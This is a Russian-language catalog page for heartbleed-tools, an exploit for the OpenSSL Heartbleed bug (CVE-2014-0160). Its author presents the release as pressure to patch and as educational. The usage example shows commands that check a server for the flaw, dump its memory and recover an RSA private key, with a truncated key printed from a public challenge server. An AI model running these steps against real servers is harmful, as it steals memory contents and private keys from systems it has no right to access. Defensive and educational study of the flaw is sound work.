Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
heartbleed-tools — OpenSSL Heartbleed (CVE-2014-0160) — сканер уязвимости, инструменты для извлечения данных и восстановления ключей RSA. | Kitploit
Инструменты/GitHubGitHub/einaros/heartbleed-tools
Сканеры уязвимостейЭксплуатацияСбор информацииКриптографияТестирование на ПроникновениеОбучение и Образование
GitHubeinaros/heartbleed-tools

heartbleed-tools

OpenSSL Heartbleed (CVE-2014-0160) — сканер уязвимости, инструменты для извлечения данных и восстановления ключей RSA.

Репозиторий
98215012 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Сканер уязвимости OpenSSL Heartbleed (CVE-2014-0160), дата-майнер и инструменты восстановления RSA-ключей.

Автор: Einar Otto Stangvik / @einaros / https://hacking.ventures

Поскольку секрет давно раскрыт, и другие уже начали публиковать свои инструменты, я тоже выкладываю свои. Надеюсь, это усилит давление на тех, кто до сих пор не установил патчи или не обновил свои серверы. Другие могут найти эти инструменты полезными в образовательных целях.

В отличие от многих других PoC Heartbleed, этот инструмент предоставит максимально возможное количество шифров в начальном пакете ClientHello. Какой бы шифр ни выбрал сервер, он будет использоваться для всех последующих пакетов ClientHello в сессии дампа. Это должно обеспечить надлежащее обнаружение уязвимости, а также снизить накладные расходы после того, как шифр будет найден.

Используйте эти инструменты как вам угодно, но окажите всем нам услугу: решайте проблемы, а не создавайте их.

Вдохновлено работами и публикациями:

  • Jared Stafford
  • Jeremi M Gosney
  • Ben M Murphy
  • ... и многих других.

Использование:

Здесь показано восстановление одного из RSA-простых чисел задачи CloudFlare 34 раза за одну минуту. Это означает получение полного закрытого ключа 34 раза за одну минуту. img

root@kitploit:~
# Test vulnerability using unobtrusive mode
# This will request N bytes, but supply N-1 itself, so that the server will
# only actually bleed a single byte if vulnerable. Suggested N is 16360 in this
# case, since that will result in a single TLS record: 
# 3 + 2 + 1 + 2 + 16360 + 16 bytes = 0xFFFF.

$ ./hb.py -u -n 16360 -p 443 www.example.int
www.example.int:443 is vulnerable

# Dupm data from CloudFlare's old challenge server

$ ./hb.py -p 443 www.cloudflarechallenge.com -n 0xF000 -l 100 -t 50 -d -o cloudflare-dump.bin
[2014/04/14 10:55:48] Incoming data rate: 85877 kbps
... runs for a while

# Look for prime in the dump

$ ./keyscan.py cloudflare.crt cloudflare-dump.bin
Key size: 128
Data length: 173476834
cloudflare-dump.bin Offset 0xf155ec: p = 13827796798740740191625032142481917804987720337701...

# Extract key once found

$ ./keyscan.py cloudflare.crt cloudflare-dump.bin 0xf155ec
Prime should be at offset: f155ec
Key size: 128

Hexdump of surrounding data:
f151ec: D0 00 00 00 00 00 00 00 00 00 00 00 00 00 30 C0  ..............0.
f151fc: 3C 01 00 00 00 00 00 00 00 00 00 00 00 00 90 8B  <...............
f1520c: D0 00 00 00 00 00 02 00 C3 A3 4D 08 48 47 00 00  ..........M.HG..
...

-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAm0AWkVnDx5feOctdC97Ztgvtd25uKKmhjCHpLycmExe1RiRSl/hGIL7f8Fg/
qiUztVm5uXZJ1UG7dzz+9OtTNh+v27BtzPsU3yivHevwAB1mTMtP6bPuXBjzsxRcC9yVcBBWpKBM
...

Лицензия

Автор не может и не будет претендовать на какие-либо права на любую часть этого пакета. Он основан на открытых идеях и останется открытым, насколько это зависит от автора.

Скачать инструмент